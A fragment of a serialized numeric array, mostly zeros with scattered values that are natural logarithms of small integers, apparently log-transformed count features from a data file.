0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 7.052721049232323, 0.0, 2.302585092994046, 0.0, 0.0, 2.0794415416798357,\n 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.6375861597263857, 5.58914919554, 0.0, 0.0, 0.0, 0.0, \n 5.1298987149230735, 0, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.70805020110221, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.9318256327243257, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0,\n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 8.995948045406804, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 3.6888794541139363, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.7612001156935624, 0.0, 0.0, 1.791759469228055, 0.0, \n 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, \n 2.550898738446989, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 3.295836866004329, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 3.7369991058576035, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.1588830833596715, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.8398715690385097, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221,\n 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, \n 0.0, 0.0, 0.0, 2.5649493574615367, 0, 5.679743138077019, 0.0, 0, \n 1.7412592803704001, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 5.952096120109145, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, \n 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 7.783640596221253, 0.0, 1.791759469228055, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 4.499809670330265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 6.6052979209482015, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.833213344056216, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 5.952096120109145, 0.0, \n 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.0301047650807, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.367295829986474, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, \n 2.302585092994046, 5.375278407684164, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.7369991058576035, 0, 0, 3.295836866004329, 0.0, 3.5263605246161616, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.581130849408909, 0.0, 0,\n 0.0, 2.995732273553991, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.0841946160253872,\n 0.0, 2.4849066497880004, 0.0, 0.0, 5.375278407684164, 0.0, 0.0, 0.0, \n 5.8377304471659395, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.518263445217986, 0.0, 3.295836866004329, \n 2.9444389791664403, 0.0, 0.0, 0.0, 5.030104765080701, 0, 0, 0.0, 0.0, \n 2.5649493574615367, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 0.0, 0.0, 2.9444389791664403, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 2.1972245773362196, 0, 0.0, 0, 2.4849066497880004, 0.0, \n 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 3.295836866004329, 5.952096120109145, 0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0,\n 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8903717578961645, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.8289456176102075, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.0910424533583156, \n 0.0, 0, 0.0, 2.302585092994046, 2.772588722239781, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 4.672828834461906, 0, 0.0, 0.0, 3.649511027115099, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.110873864173311, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0.0, 0, 2.70805020110221, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.8918202981106265, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.1354942159291497, 0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.302585092994046, 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 3.044522437723423, 0, 